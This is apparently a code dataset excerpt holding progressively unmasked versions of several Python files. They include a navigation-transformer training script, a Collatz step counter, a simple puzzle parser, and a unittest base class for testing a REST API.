top_k_inds = np.unravel_index(top_k_inds, shape=(512, 512))
pred_path[top_k_inds] = 1.1
pred_path[pred_path < 1.0] = 0
pred_path[top_k_inds] = 1.0
elif threshold is not None:
pred_path[pred_path < threshold] = 0
else:
pred_path = pred_path
pred_path = np.tile(pred_path, (1, 1, 3)).astype(float)
pred_ax = ax[1, 1]
pred_ax.imshow(pred_path)
file_path = f'{out_path}.png'
print(f'saving to {file_path}')
plt.savefig(file_path)
plt.close()
def validate(self, batch_instance, epoch_num, batch_num, instance_num,
top_k, threshold):
self.encoder.eval()
outputs = self.encoder(batch_instance)
next_position = outputs['next_position']
next_position = tiles_to_image(next_position, self.patch_size,
output_type='per-patch', upsample=True)
next_p, next_r, next_f1 = self.f1_metric.compute_f1(batch_instance[
'path_state'].unsqueeze(-1), next_position)
if epoch_num > self.generate_after_n:
for i in range(outputs['next_position'].shape[0]):
output_path = self.checkpoint_dir.joinpath(f'batch_{batch_num}'
).joinpath(f'instance_{i}')
output_path.mkdir(parents=True, exist_ok=True)
command = batch_instance['command'][i]
command = [x for x in command if x != '<PAD>']
command = ' '.join(command)
image = batch_instance['input_image'][i]
path_state = batch_instance['path_state'][i]
pred_path = next_position[i]
self.generate_debugging_image(image, path_state, pred_path,
output_path, caption=command, top_k=top_k, threshold=
threshold)
return {'next_f1': next_f1}
def compute_f1(self, true_pos, pred_pos):
eps = 1e-08
values, pred_pixels = torch.max(pred_pos, dim=1)
gold_pixels = true_pos
pred_pixels = pred_pixels.unsqueeze(1)
pred_pixels = pred_pixels.detach().cpu().float()
gold_pixels = gold_pixels.detach().cpu().float()
total_pixels = sum(pred_pixels.shape)
true_pos = torch.sum(pred_pixels * gold_pixels).item()
true_neg = torch.sum((1 - pred_pixels) * (1 - gold_pixels)).item()
false_pos = torch.sum(pred_pixels * (1 - gold_pixels)).item()
false_neg = torch.sum((1 - pred_pixels) * gold_pixels).item()
precision = true_pos / (true_pos + false_pos + eps)
recall = true_pos / (true_pos + false_neg + eps)
f1 = 2 * (precision * recall) / (precision + recall + eps)
return precision, recall, f1
def main(args):
device = 'cpu'
if args.cuda is not None:
free_gpu_id = get_free_gpu()
if free_gpu_id > -1:
device = f'cuda:{free_gpu_id}'
device = torch.device(device)
print(f'On device {device}')
nlp = English()
tokenizer = Tokenizer(nlp.vocab)
dataset_reader = NavigationDatasetReader(dir=args.data_dir, out_path=
args.out_path, path_width=args.path_width, read_limit=args.
read_limit, batch_size=args.batch_size, max_len=args.max_len,
tokenizer=tokenizer, shuffle=args.shuffle, overfit=args.overfit,
is_bert='bert' in args.embedder)
checkpoint_dir = pathlib.Path(args.checkpoint_dir)
if not checkpoint_dir.exists():
checkpoint_dir.mkdir()
if not args.test:
with open(dataset_reader.path_dict['train'].joinpath('vocab.json')
) as f1:
train_vocab = json.load(f1)
with open(checkpoint_dir.joinpath('vocab.json'), 'w') as f1:
json.dump(list(train_vocab), f1)
else:
print(f'Reading vocab from {checkpoint_dir}')
with open(checkpoint_dir.joinpath('vocab.json')) as f1:
train_vocab = json.load(f1)
print(f'got data')
print(f'constructing model...')
if args.embedder == 'random':
embedder = RandomEmbedder(tokenizer, train_vocab, args.
embedding_dim, trainable=True)
elif args.embedder == 'glove':
embedder = GloveEmbedder(tokenizer, train_vocab, args.
embedding_file, args.embedding_dim, trainable=True)
elif args.embedder.startswith('bert'):
embedder = BERTEmbedder(model_name=args.embedder, max_seq_len=args.
max_len)
else:
raise NotImplementedError(f'No embedder {args.embedder}')
depth = 1
encoder_cls = NavigationTransformerEncoder
encoder_kwargs = dict(image_size=args.resolution, patch_size=args.
patch_size, language_embedder=embedder, n_layers=args.n_layers,
channels=args.channels, n_heads=args.n_heads, hidden_dim=args.
hidden_dim, ff_dim=args.ff_dim, dropout=args.dropout, embed_dropout
=args.embed_dropout, output_type=args.output_type,
positional_encoding_type=args.pos_encoding_type, device=device,
log_weights=args.test, locality_mask=args.locality_mask,
locality_neighborhood=args.locality_neighborhood, init_scale=args.
init_scale)
encoder = encoder_cls(**encoder_kwargs)
if args.cuda is not None:
encoder = encoder.cuda(device)
print(encoder)
optimizer = torch.optim.Adam(encoder.parameters(), lr=args.learn_rate)
scheduler = NoamLR(optimizer, model_size=args.hidden_dim, warmup_steps=
args.warmup, factor=args.lr_factor)
best_epoch = -1
block_size = int(args.resolution * 4 / 64)
if not args.test:
if not args.resume:
try:
os.mkdir(args.checkpoint_dir)
except FileExistsError:
try:
assert len(glob.glob(os.path.join(args.checkpoint_dir,
'*.th'))) == 0
except AssertionError:
raise AssertionError(
f'Output directory {args.checkpoint_dir} non-empty, will not overwrite!'
)
else:
encoder = encoder.to('cpu')
state_dict = torch.load(pathlib.Path(args.checkpoint_dir).
joinpath('best.th'), map_location='cpu')
encoder.load_state_dict(state_dict, strict=True)
encoder = encoder.cuda(device)
best_checkpoint_data = json.load(open(pathlib.Path(args.
checkpoint_dir).joinpath('best_training_state.json')))
print(f'best_checkpoint_data {best_checkpoint_data}')
best_epoch = best_checkpoint_data['epoch']
with open(pathlib.Path(args.checkpoint_dir).joinpath('config.yaml'),
'w') as f1:
dump_args = copy.deepcopy(args)
del dump_args.__dict__['cfg']
del dump_args.__dict__['__cwd__']
del dump_args.__dict__['__path__']
to_dump = dump_args.__dict__
yaml.safe_dump(to_dump, f1, encoding='utf-8', allow_unicode=True)
else:
print(f'loading model weights from {args.checkpoint_dir}')
encoder = encoder.to('cpu')
state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath(
'best.th'), map_location='cpu')
encoder.load_state_dict(state_dict, strict=True)
encoder = encoder.cuda(device)
num_blocks = 1
trainer = NavigationTransformerTrainer(dataset_reader=dataset_reader,
encoder=encoder, optimizer=optimizer, scheduler=scheduler,
num_epochs=args.num_epochs, num_blocks=num_blocks, device=device,
checkpoint_dir=args.checkpoint_dir, checkpoint_every=args.
checkpoint_every, validation_limit=args.validation_limit,
num_models_to_keep=args.num_models_to_keep, generate_after_n=args.
generate_after_n, score_type=args.score_type, depth=depth,
resolution=args.resolution, output_type=args.output_type,
patch_size=args.patch_size, block_size=block_size, best_epoch=
best_epoch, seed=args.seed, zero_weight=args.zero_weight,
debug_image_top_k=args.debug_image_top_k, debug_image_threshold=
args.debug_image_threshold)
if not args.test:
trainer.train()
else:
print(f'evaluating')
acc = trainer.evaluate()
print(f'accuracy: {acc}')
if __name__ == '__main__':
np.random.seed(12)
torch.manual_seed(12)
parser = configure_parser()
args = parser.parse_args()
main(args)
| import json
from jsonargparse import ArgumentParser, ActionConfigFile
import yaml
from typing import List, Dict
import glob
import os
import pathlib
import pdb
import subprocess
import copy
from io import StringIO
from collections import defaultdict
import torch
from spacy.tokenizer import Tokenizer
from spacy.lang.en import English
from einops import rearrange
import logging
from tqdm import tqdm
import matplotlib
from matplotlib import pyplot as plt
import matplotlib.patches as patches
from matplotlib import gridspec
import numpy as np
import torch.autograd.profiler as profiler
from torch.nn import functional as F
from torch.optim.lr_scheduler import StepLR
from allennlp.training.scheduler import Scheduler
from allennlp.training.learning_rate_schedulers import NoamLR
import pandas as pd
from transformer import TransformerEncoder, ResidualTransformerEncoder, image_to_tiles, tiles_to_image
from metrics import MSEMetric, AccuracyMetric, F1Metric
from language_embedders import RandomEmbedder, GloveEmbedder, BERTEmbedder
from navigation_data import NavigationDatasetReader, NavigationImageTrajectory, configure_parser
from train_language_encoder import get_free_gpu, load_data, get_vocab, LanguageTrainer, FlatLanguageTrainer
from navigation_transformer import NavigationTransformerEncoder
from train_transformer import TransformerTrainer
logger = logging.getLogger(__name__)
class NavigationTransformerTrainer(TransformerTrainer):
def __init__(self,
dataset_reader: NavigationDatasetReader,
encoder: TransformerEncoder,
optimizer: torch.optim.Optimizer,
scheduler: Scheduler,
num_epochs: int,
num_blocks: int,
device: torch.device,
checkpoint_dir: str,
num_models_to_keep: int,
generate_after_n: int,
resolution: int = 64,
patch_size: int = 8,
block_size: int = 4,
batch_size: int = 16,
output_type: str = "per-pixel",
checkpoint_every: int = 64,
validation_limit: int = 16,
depth: int = 7,
score_type: str = "acc",
best_epoch: int = -1,
seed: int = 12,
zero_weight: float = 0.05,
debug_image_top_k: int = None,
debug_image_threshold: float = None):
super(NavigationTransformerTrainer, self).__init__(train_data=[],
val_data=[],
encoder=encoder,
optimizer=optimizer,
scheduler=scheduler,
num_epochs=num_epochs,
num_blocks=num_blocks,
device=device,
checkpoint_dir=checkpoint_dir,
num_models_to_keep=num_models_to_keep,
generate_after_n=generate_after_n,
score_type=score_type,
patch_size=patch_size,
block_size=block_size,
output_type=output_type,
resolution=resolution,
depth=depth,
best_epoch=best_epoch,
seed=seed,
zero_weight=zero_weight)
self.f1_metric = F1Metric()
self.dataset_reader = dataset_reader
self.batch_size = batch_size
self.checkpoint_every = checkpoint_every
self.validation_limit = validation_limit
if debug_image_top_k < 0:
debug_image_top_k = None
if debug_image_threshold < 0:
debug_image_threshold = None
self.debug_image_top_k = debug_image_top_k
self.debug_image_threshold = debug_image_threshold
def split_large_batch(self, batch):
large_bsz = batch['path_state'].shape[0]
small_batches = []
for i in range(0, large_bsz, self.batch_size):
small_batch = {}
for k in batch.keys():
small_batch[k] = batch[k][i:i+self.batch_size]
small_batches.append(small_batch)
return small_batches
def validate_one_epoch(self, epoch, step, validation_limit):
print(f"Validating epoch {epoch} step {step}...")
total_prev_acc, total_next_acc = 0.0, 0.0
total = 0
self.encoder.eval()
for b, dev_batch_instance in enumerate(self.dataset_reader.read("dev", validation_limit)):
actual_batches = self.split_large_batch(dev_batch_instance)
for small_batch in actual_batches:
score_dict = self.validate(small_batch, epoch, b, 0)
total_next_acc += score_dict['next_f1']
total += 1
mean_next_acc = total_next_acc / total
return mean_next_acc
def evaluate(self):
total_acc = 0.0
total = 0
total_block_acc = 0.0
self.encoder.eval()
for b, dev_batch_instance in tqdm(enumerate(self.dataset_reader.read("dev", self.validation_limit))):
actual_batches = self.split_large_batch(dev_batch_instance)
for small_batch in actual_batches:
score_dict = self.validate(small_batch, 10, b, 0, self.debug_image_top_k, self.debug_image_threshold)
total_acc += score_dict['next_f1']
total += 1
mean_acc = total_acc / total
print(f"Test-time pixel acc {mean_acc * 100}")
return mean_acc
def train_and_validate_one_epoch(self, epoch):
print(f"Training epoch {epoch}...")
self.encoder.train()
skipped = 0
step = 0
for b, batch_instance in enumerate(self.dataset_reader.read("train")):
actual_batches = self.split_large_batch(batch_instance)
for sb, small_batch in enumerate(actual_batches):
is_best = False
self.optimizer.zero_grad()
outputs = self.encoder(small_batch)
# skip bad examples
if outputs is None:
skipped += 1
continue
loss = self.compute_patch_loss(small_batch, outputs, self.next_to_prev_weight)
loss.backward()
self.optimizer.step()
it = (epoch + 1) * (step+1)
self.scheduler.step_batch(it)
#print(f"step: {step+1} checkpoint_every: {self.checkpoint_every} {(step +1) % self.checkpoint_every}")
if (step+1) % self.checkpoint_every == 0:
step_acc = self.validate_one_epoch(epoch, step, self.validation_limit)
print(f"Epoch {epoch} step {step} has next pixel F1 {step_acc * 100:.2f}")
if step_acc > self.best_score:
is_best = True
self.best_score = step_acc
self.save_model(f"{epoch}_{step}", is_best)
step += 1
print(f"skipped {skipped} examples")
epoch_acc = self.validate_one_epoch(epoch, step, 10 * self.validation_limit)
print(f"Epoch {epoch} has next pixel F1 {epoch_acc * 100:.2f}")
if self.score_type == "acc":
return (epoch_acc)/2, -1.0
else:
raise AssertionError(f"invalid score type {self.score_type}")
def compute_patch_loss(self, inputs, outputs, next_to_prev_weight = [1.0, 1.0]):
"""
compute per-patch for each patch
"""
bsz, w, h, __ = inputs['input_image'].shape
pred_next_image = outputs["next_position"]
path_state = inputs['path_state'].reshape(bsz, 1, w, h).float()
true_next_image = image_to_tiles(path_state, self.patch_size)
# binarize patches
next_sum_image = torch.sum(true_next_image, dim = 2, keepdim=True)
next_patches = torch.zeros_like(next_sum_image)
# any patch that has a 1 pixel in it gets 1
next_patches[next_sum_image != 0] = 1
pred_next_image = pred_next_image.squeeze(-1)
next_patches = next_patches.squeeze(-1).to(self.device).long()
pred_next_image = rearrange(pred_next_image, 'b n c -> b c n')
next_pixel_loss = self.weighted_xent_loss_fxn(pred_next_image, next_patches)
total_loss = next_pixel_loss
print(f"loss {total_loss.item()}")
return total_loss
def generate_debugging_image(self,
true_img,
path_state,
pred_path,
out_path,
caption = None,
top_k = None,
threshold = None):
caption = self.wrap_caption(caption)
fig, ax = plt.subplots(2,2, figsize=(16,16))
# gs = gridspec.GridSpec(2, 2, width_ratios=[2, 1])
text_ax = ax[0,1]
text_ax.axis([0, 1, 0, 1])
text_ax.text(0.2, 0.02, caption, fontsize = 12)
text_ax.axis("off")
props = dict(boxstyle='round',
facecolor='wheat', alpha=0.5)
text_ax.text(0.05, 0.95, caption, wrap=True, fontsize=14,
verticalalignment='top', bbox=props)
# img_ax = plt.subplot(gs[2])
img_ax = ax[1,0]
#w = int(40 * (self.resolution / 224))
true_img = true_img.detach().cpu().numpy().astype(float)[:,:,0:3]
img_ax.imshow(true_img)
true_path = path_state.detach().numpy()
true_path = np.tile(true_path.reshape(512, 512, 1), (1,1,3)).astype(float)
true_ax = ax[0,0]
true_ax.imshow(true_path)
pred_path = torch.softmax(pred_path, dim=0)
pred_path = pred_path[1,:,:]
pred_path = pred_path.cpu().detach().numpy().reshape(512, 512, 1)
if top_k is not None:
top_k_inds = np.argpartition(pred_path, -top_k, axis=None)[-top_k:]
top_k_inds = np.unravel_index(top_k_inds, shape = (512, 512))
pred_path[top_k_inds] = 1.1
pred_path[pred_path<1.0] = 0
pred_path[top_k_inds] = 1.0
elif threshold is not None:
pred_path[pred_path < threshold] = 0
else:
pred_path = pred_path
pred_path = np.tile(pred_path, (1,1,3)).astype(float)
pred_ax = ax[1,1]
pred_ax.imshow(pred_path)
file_path = f"{out_path}.png"
print(f"saving to {file_path}")
plt.savefig(file_path)
plt.close()
def validate(self, batch_instance, epoch_num, batch_num, instance_num, top_k, threshold):
self.encoder.eval()
outputs = self.encoder(batch_instance)
next_position = outputs['next_position']
next_position = tiles_to_image(next_position, self.patch_size, output_type="per-patch", upsample=True)
# f1 metric
next_p, next_r, next_f1 = self.f1_metric.compute_f1(batch_instance["path_state"].unsqueeze(-1), next_position)
if epoch_num > self.generate_after_n:
for i in range(outputs["next_position"].shape[0]):
output_path = self.checkpoint_dir.joinpath(f"batch_{batch_num}").joinpath(f"instance_{i}")
output_path.mkdir(parents = True, exist_ok=True)
command = batch_instance["command"][i]
command = [x for x in command if x != "<PAD>"]
command = " ".join(command)
image = batch_instance['input_image'][i]
path_state = batch_instance["path_state"][i]
pred_path = next_position[i]
self.generate_debugging_image(image,
path_state,
pred_path,
output_path,
caption = command,
top_k = top_k,
threshold = threshold)
return {"next_f1": next_f1}
def compute_f1(self, true_pos, pred_pos):
eps = 1e-8
values, pred_pixels = torch.max(pred_pos, dim=1)
gold_pixels = true_pos
pred_pixels = pred_pixels.unsqueeze(1)
pred_pixels = pred_pixels.detach().cpu().float()
gold_pixels = gold_pixels.detach().cpu().float()
total_pixels = sum(pred_pixels.shape)
true_pos = torch.sum(pred_pixels * gold_pixels).item()
true_neg = torch.sum((1-pred_pixels) * (1 - gold_pixels)).item()
false_pos = torch.sum(pred_pixels * (1 - gold_pixels)).item()
false_neg = torch.sum((1-pred_pixels) * gold_pixels).item()
precision = true_pos / (true_pos + false_pos + eps)
recall = true_pos / (true_pos + false_neg + eps)
f1 = 2 * (precision * recall) / (precision + recall + eps)
return precision, recall, f1
def main(args):
device = "cpu"
if args.cuda is not None:
free_gpu_id = get_free_gpu()
if free_gpu_id > -1:
device = f"cuda:{free_gpu_id}"
#device = "cuda:0"
device = torch.device(device)
print(f"On device {device}")
#test = torch.ones((1))
#test = test.to(device)
nlp = English()
tokenizer = Tokenizer(nlp.vocab)
dataset_reader = NavigationDatasetReader(dir = args.data_dir,
out_path = args.out_path,
path_width = args.path_width,
read_limit = args.read_limit,
batch_size = args.batch_size,
max_len = args.max_len,
tokenizer = tokenizer,
shuffle = args.shuffle,
overfit = args.overfit,
is_bert = "bert" in args.embedder)
checkpoint_dir = pathlib.Path(args.checkpoint_dir)
if not checkpoint_dir.exists():
checkpoint_dir.mkdir()
if not args.test:
with open(dataset_reader.path_dict['train'].joinpath("vocab.json")) as f1:
train_vocab = json.load(f1)
with open(checkpoint_dir.joinpath("vocab.json"), "w") as f1:
json.dump(list(train_vocab), f1)
else:
print(f"Reading vocab from {checkpoint_dir}")
with open(checkpoint_dir.joinpath("vocab.json")) as f1:
train_vocab = json.load(f1)
print(f"got data")
# construct the vocab and tokenizer
print(f"constructing model...")
# get the embedder from args
if args.embedder == "random":
embedder = RandomEmbedder(tokenizer, train_vocab, args.embedding_dim, trainable=True)
elif args.embedder == "glove":
embedder = GloveEmbedder(tokenizer, train_vocab, args.embedding_file, args.embedding_dim, trainable=True)
elif args.embedder.startswith("bert"):
embedder = BERTEmbedder(model_name = args.embedder, max_seq_len = args.max_len)
else:
raise NotImplementedError(f"No embedder {args.embedder}")
depth = 1
encoder_cls = NavigationTransformerEncoder
encoder_kwargs = dict(image_size = args.resolution,
patch_size = args.patch_size,
language_embedder = embedder,
n_layers = args.n_layers,
channels = args.channels,
n_heads = args.n_heads,
hidden_dim = args.hidden_dim,
ff_dim = args.ff_dim,
dropout = args.dropout,
embed_dropout = args.embed_dropout,
output_type = args.output_type,
positional_encoding_type = args.pos_encoding_type,
device = device,
log_weights = args.test,
locality_mask = args.locality_mask,
locality_neighborhood = args.locality_neighborhood,
init_scale = args.init_scale)
# Initialize encoder
encoder = encoder_cls(**encoder_kwargs)
if args.cuda is not None:
encoder = encoder.cuda(device)
print(encoder)
# construct optimizer
optimizer = torch.optim.Adam(encoder.parameters(), lr=args.learn_rate)
# scheduler
scheduler = NoamLR(optimizer, model_size = args.hidden_dim, warmup_steps = args.warmup, factor = args.lr_factor)
best_epoch = -1
block_size = int((args.resolution * 4)/64)
if not args.test:
if not args.resume:
try:
os.mkdir(args.checkpoint_dir)
except FileExistsError:
# file exists
try:
assert(len(glob.glob(os.path.join(args.checkpoint_dir, "*.th"))) == 0)
except AssertionError:
raise AssertionError(f"Output directory {args.checkpoint_dir} non-empty, will not overwrite!")
else:
# resume from pre-trained
encoder = encoder.to("cpu")
state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath("best.th"), map_location='cpu')
encoder.load_state_dict(state_dict, strict=True)
encoder = encoder.cuda(device)
# get training info
best_checkpoint_data = json.load(open(pathlib.Path(args.checkpoint_dir).joinpath("best_training_state.json")))
print(f"best_checkpoint_data {best_checkpoint_data}")
best_epoch = best_checkpoint_data["epoch"]
# save arg config to checkpoint_dir
with open(pathlib.Path(args.checkpoint_dir).joinpath("config.yaml"), "w") as f1:
dump_args = copy.deepcopy(args)
# drop stuff we can't serialize
del(dump_args.__dict__["cfg"])
del(dump_args.__dict__["__cwd__"])
del(dump_args.__dict__["__path__"])
to_dump = dump_args.__dict__
# dump
yaml.safe_dump(to_dump, f1, encoding='utf-8', allow_unicode=True)
else:
# test-time, load best model
print(f"loading model weights from {args.checkpoint_dir}")
#state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath("best.th"))
#encoder.load_state_dict(state_dict, strict=True)
encoder = encoder.to("cpu")
state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath("best.th"), map_location='cpu')
encoder.load_state_dict(state_dict, strict=True)
encoder = encoder.cuda(device)
num_blocks = 1
# construct trainer
trainer = NavigationTransformerTrainer(dataset_reader = dataset_reader,
encoder = encoder,
optimizer = optimizer,
scheduler = scheduler,
num_epochs = args.num_epochs,
num_blocks = num_blocks,
device = device,
checkpoint_dir = args.checkpoint_dir,
checkpoint_every = args.checkpoint_every,
validation_limit = args.validation_limit,
num_models_to_keep = args.num_models_to_keep,
generate_after_n = args.generate_after_n,
score_type=args.score_type,
depth = depth,
resolution = args.resolution,
output_type = args.output_type,
patch_size = args.patch_size,
block_size = block_size,
best_epoch = best_epoch,
seed = args.seed,
zero_weight = args.zero_weight,
debug_image_top_k = args.debug_image_top_k,
debug_image_threshold = args.debug_image_threshold)
if not args.test:
trainer.train()
else:
print(f"evaluating")
acc = trainer.evaluate()
print(f"accuracy: {acc}")
if __name__ == "__main__":
np.random.seed(12)
torch.manual_seed(12)
parser = configure_parser()
args = parser.parse_args()
main(args)
| [
10,
11,
12,
13,
15
] |
643 | 104c49941a79948749b27217a0c728f19435f77a | <mask token>
| <mask token>
print(z)
| <mask token>
x = int(raw_input('Please supply a number: '))
y = int(raw_input('Please supply a second number: '))
z = random.randint(x, y)
print(z)
| import random
x = int(raw_input('Please supply a number: '))
y = int(raw_input('Please supply a second number: '))
z = random.randint(x, y)
print(z)
| null | [
0,
1,
2,
3
] |
644 | 3605f46da25eb98767ca8d7248beaa07572d3171 | <mask token>
| <mask token>
for line in open('9.in'):
if line:
processing_pattern = False
new_line = ''
for idx, char in enumerate(line):
pattern_found = False
if line[idx] == '(' and line[idx + 1].isnumeric() and line[idx + 2
] == 'x' and line[idx + 3].isnumeric() and line[idx + 4
] == ')':
pattern_found = True
num_chars = int(line[idx + 1])
repeat_times = int(line[idx + 3])
else:
new_line += char
processed_lines.append(new_line)
| processed_lines = []
for line in open('9.in'):
if line:
processing_pattern = False
new_line = ''
for idx, char in enumerate(line):
pattern_found = False
if line[idx] == '(' and line[idx + 1].isnumeric() and line[idx + 2
] == 'x' and line[idx + 3].isnumeric() and line[idx + 4
] == ')':
pattern_found = True
num_chars = int(line[idx + 1])
repeat_times = int(line[idx + 3])
else:
new_line += char
processed_lines.append(new_line)
| null | null | [
0,
1,
2
] |
645 | e7db3390d30f86e19eee930c48e5f848f41cc579 | <mask token>
| <mask token>
while True:
if c0 % 2 == 0:
c0 //= 2
if c0 != 1:
step += 1
print(' New value is ', c0, ':', 'step', step)
continue
elif c0 == 1:
step += 1
print(' New value is ', c0, ':', 'step', step)
break
elif c0 % 2 == 1:
c0 = c0 * 3 + 1
if c0 != 1:
step += 1
print(' New value is ', c0, ':', 'step', step)
continue
elif c0 == 1:
step += 1
print(' New value is ', c0, ':', 'step:', step)
break
print('Total Steps: ', step)
| c0 = int(input('Enter a non- negative, non-zero integer: '))
step = 0
while True:
if c0 % 2 == 0:
c0 //= 2
if c0 != 1:
step += 1
print(' New value is ', c0, ':', 'step', step)
continue
elif c0 == 1:
step += 1
print(' New value is ', c0, ':', 'step', step)
break
elif c0 % 2 == 1:
c0 = c0 * 3 + 1
if c0 != 1:
step += 1
print(' New value is ', c0, ':', 'step', step)
continue
elif c0 == 1:
step += 1
print(' New value is ', c0, ':', 'step:', step)
break
print('Total Steps: ', step)
| # take any non-negative and non-zero integer number and name it c0;if it's even, evaluate a new c0 as c0 ÷ 2;
# otherwise, if it's odd, evaluate a new c0 as 3 × c0 + 1;
# if c0 ≠ 1, skip to point 2.
# The hypothesis says that regardless of the initial value of c0,it will always go to 1.
# Write a program which reads one natural number and executes the above steps as long as c0 remains different from 1.
# We also want you to count the steps needed to achieve the goal. Your code should output all the intermediate values of c0, too.
c0 = int(input('Enter a non- negative, non-zero integer: '))
step = 0
while True:
if c0 % 2 == 0:
c0 //= 2
if c0 != 1:
step += 1
print(' New value is ', c0, ':', 'step', step)
continue
elif c0 == 1:
step += 1
print(' New value is ', c0, ':', 'step', step)
break
elif c0 % 2 == 1:
c0 = c0 * 3 + 1
if c0 != 1:
step += 1
print(' New value is ', c0, ':', 'step', step)
continue
elif c0 == 1:
step += 1
print(' New value is ', c0, ':', 'step:', step)
break
print('Total Steps: ', step)
| null | [
0,
1,
2,
3
] |
646 | c455de70a79f70f5f0e21391511f5035f1b4feb9 | <mask token>
class Base(unittest.TestCase):
<mask token>
def setUp(self):
self.schemas = {}
self.session = requests.Session()
self.session.headers.update({'x-apikey': SETTINGS['APIKEY']})
self.addCleanup(self.close_session)
def close_session(self):
self.session.close()
@property
def root(self):
"""Return the API root data."""
try:
return self._root
except AttributeError:
response = self.GET(SETTINGS['ROOT_URL'])
self.assertEqual(response.status_code, http.client.OK)
self._root = self.check_schema(response)
return self._root
def GET(self, url):
return self.session.get(url)
<mask token>
<mask token>
def DELETE(self, url):
return self.session.delete(url)
def check_schema(self, response):
"""Check that the response JSON data matches the schema
linked to in the response header.
Return the response JSON.
"""
self.assertEqual(response.status_code, http.client.OK)
result = response.json()
url = response.links['schema']['url']
try:
schema = self.schemas[url]
except KeyError:
r = self.GET(url)
self.assertEqual(r.status_code, http.client.OK)
schema = r.json()
self.schemas[url] = schema
self.validate_schema(result, schema)
return result
def validate_schema(self, instance, schema):
"""Validate the JSON instance versus the given JSON schema."""
jsonschema.validate(instance=instance, schema=schema,
format_checker=jsonschema.draft7_format_checker)
| <mask token>
def process_args(filepath=None):
"""Process command-line arguments for this test suite.
Reset the settings and read the given settings file.
Return the unused arguments.
"""
if filepath is None:
parser = argparse.ArgumentParser()
parser.add_argument('-S', '--settings', dest='settings', metavar=
'FILE', default='settings.json', help='Settings file')
parser.add_argument('unittest_args', nargs='*')
options, args = parser.parse_known_args()
filepath = options.settings
args = [sys.argv[0]] + args
else:
args = sys.argv
SETTINGS.update(DEFAULT_SETTINGS)
with open(filepath) as infile:
SETTINGS.update(json.load(infile))
assert SETTINGS['USERNAME']
assert SETTINGS['APIKEY']
return args
<mask token>
class Base(unittest.TestCase):
"""Base class for Symbasis test cases."""
def setUp(self):
self.schemas = {}
self.session = requests.Session()
self.session.headers.update({'x-apikey': SETTINGS['APIKEY']})
self.addCleanup(self.close_session)
def close_session(self):
self.session.close()
@property
def root(self):
"""Return the API root data."""
try:
return self._root
except AttributeError:
response = self.GET(SETTINGS['ROOT_URL'])
self.assertEqual(response.status_code, http.client.OK)
self._root = self.check_schema(response)
return self._root
def GET(self, url):
return self.session.get(url)
def POST(self, url, json=None):
return self.session.post(url, json=json)
def PUT(self, url):
return self.session.put(url)
def DELETE(self, url):
return self.session.delete(url)
def check_schema(self, response):
"""Check that the response JSON data matches the schema
linked to in the response header.
Return the response JSON.
"""
self.assertEqual(response.status_code, http.client.OK)
result = response.json()
url = response.links['schema']['url']
try:
schema = self.schemas[url]
except KeyError:
r = self.GET(url)
self.assertEqual(r.status_code, http.client.OK)
schema = r.json()
self.schemas[url] = schema
self.validate_schema(result, schema)
return result
def validate_schema(self, instance, schema):
"""Validate the JSON instance versus the given JSON schema."""
jsonschema.validate(instance=instance, schema=schema,
format_checker=jsonschema.draft7_format_checker)
| <mask token>
def process_args(filepath=None):
"""Process command-line arguments for this test suite.
Reset the settings and read the given settings file.
Return the unused arguments.
"""
if filepath is None:
parser = argparse.ArgumentParser()
parser.add_argument('-S', '--settings', dest='settings', metavar=
'FILE', default='settings.json', help='Settings file')
parser.add_argument('unittest_args', nargs='*')
options, args = parser.parse_known_args()
filepath = options.settings
args = [sys.argv[0]] + args
else:
args = sys.argv
SETTINGS.update(DEFAULT_SETTINGS)
with open(filepath) as infile:
SETTINGS.update(json.load(infile))
assert SETTINGS['USERNAME']
assert SETTINGS['APIKEY']
return args
def run():
unittest.main(argv=process_args())
class Base(unittest.TestCase):
"""Base class for Symbasis test cases."""
def setUp(self):
self.schemas = {}
self.session = requests.Session()
self.session.headers.update({'x-apikey': SETTINGS['APIKEY']})
self.addCleanup(self.close_session)
def close_session(self):
self.session.close()
@property
def root(self):
"""Return the API root data."""
try:
return self._root
except AttributeError:
response = self.GET(SETTINGS['ROOT_URL'])
self.assertEqual(response.status_code, http.client.OK)
self._root = self.check_schema(response)
return self._root
def GET(self, url):
return self.session.get(url)
def POST(self, url, json=None):
return self.session.post(url, json=json)
def PUT(self, url):
return self.session.put(url)
def DELETE(self, url):
return self.session.delete(url)
def check_schema(self, response):
"""Check that the response JSON data matches the schema
linked to in the response header.
Return the response JSON.
"""
self.assertEqual(response.status_code, http.client.OK)
result = response.json()
url = response.links['schema']['url']
try:
schema = self.schemas[url]
except KeyError:
r = self.GET(url)
self.assertEqual(r.status_code, http.client.OK)
schema = r.json()
self.schemas[url] = schema
self.validate_schema(result, schema)
return result
def validate_schema(self, instance, schema):
"""Validate the JSON instance versus the given JSON schema."""
jsonschema.validate(instance=instance, schema=schema,
format_checker=jsonschema.draft7_format_checker)
| <mask token>
SCHEMA_LINK_RX = re.compile('<([^>])+>; rel="([^"]+)')
JSON_MIMETYPE = 'application/json'
DEFAULT_SETTINGS = {'ROOT_URL': 'http://127.0.0.1:5002/api', 'USERNAME':
None, 'APIKEY': None}
SETTINGS = {}
def process_args(filepath=None):
"""Process command-line arguments for this test suite.
Reset the settings and read the given settings file.
Return the unused arguments.
"""
if filepath is None:
parser = argparse.ArgumentParser()
parser.add_argument('-S', '--settings', dest='settings', metavar=
'FILE', default='settings.json', help='Settings file')
parser.add_argument('unittest_args', nargs='*')
options, args = parser.parse_known_args()
filepath = options.settings
args = [sys.argv[0]] + args
else:
args = sys.argv
SETTINGS.update(DEFAULT_SETTINGS)
with open(filepath) as infile:
SETTINGS.update(json.load(infile))
assert SETTINGS['USERNAME']
assert SETTINGS['APIKEY']
return args
def run():
unittest.main(argv=process_args())
class Base(unittest.TestCase):
"""Base class for Symbasis test cases."""
def setUp(self):
self.schemas = {}
self.session = requests.Session()
self.session.headers.update({'x-apikey': SETTINGS['APIKEY']})
self.addCleanup(self.close_session)
def close_session(self):
self.session.close()
@property
def root(self):
"""Return the API root data."""
try:
return self._root
except AttributeError:
response = self.GET(SETTINGS['ROOT_URL'])
self.assertEqual(response.status_code, http.client.OK)
self._root = self.check_schema(response)
return self._root
def GET(self, url):
return self.session.get(url)
def POST(self, url, json=None):
return self.session.post(url, json=json)
def PUT(self, url):
return self.session.put(url)
def DELETE(self, url):
return self.session.delete(url)
def check_schema(self, response):
"""Check that the response JSON data matches the schema
